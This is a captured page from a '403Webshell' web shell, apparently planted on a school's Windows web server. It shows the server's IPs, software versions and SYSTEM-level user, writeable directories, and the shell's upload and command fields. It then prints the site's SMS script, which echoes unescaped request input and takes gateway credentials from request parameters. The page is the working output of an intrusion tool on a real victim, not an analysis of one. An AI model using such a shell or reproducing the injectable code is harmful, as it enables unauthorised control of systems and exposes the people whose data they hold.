403Webshell
Server IP : 172.67.187.206  /  Your IP : 172.71.28.156
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Inetpub/www/myschool/triamudom/check/webadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /Inetpub/www/myschool/triamudom/check/webadmin/function_sms.php
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Save</title>
</head>

<body>
<?php
@session_start();
$path = "../";
include ($path.'include/config_db.php');
include ($path.'include/class_db.php'); 
include ($path.'include/class_display.php'); 
include ($path.'include/function.php'); 
$CLASS['db']   = new db();
$CLASS['db']->connect(); 
$CLASS['disp']   = new display();
$db   = $CLASS['db']; 
$disp   = $CLASS['disp']; 

echo $sms_boss = $_REQUEST['sms_boss'];
echo $tb_public_telboss = $_REQUEST['tb_public_telboss'];

$checkid = $_REQUEST['checkid'];
$text_sms = $_REQUEST['text_sms'];
$text_sms_end = $_REQUEST['text_sms_end'];
$tb_student_name = $_REQUEST['tb_student_name'];
$tb_student_phone = $_REQUEST['tb_student_phone'];
$count_rows = $_REQUEST['count_rows'];
$username = $_REQUEST['username'];
$password = $_REQUEST['password'];
$secret = $_REQUEST['secret'];
$sender = $_REQUEST['sender'];
$dest = $_REQUEST['dest'];
$msg = $_REQUEST['msg'];

	for($r=0;$r<$count_rows;$r++){
		$text_sms_i = $text_sms[$r];
		$text_sms_end_i = $text_sms_end[$r];
		$tb_student_name_i = $tb_student_name[$r];
		$tb_student_phone_i = $tb_student_phone[$r];
		
	 
}

	// Send SMS To BOSS
	 

?>
<script language="javascript">window.alert('Success');</script>
<script language="javascript">window.location.href = 'display_report_sms.php'</script>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit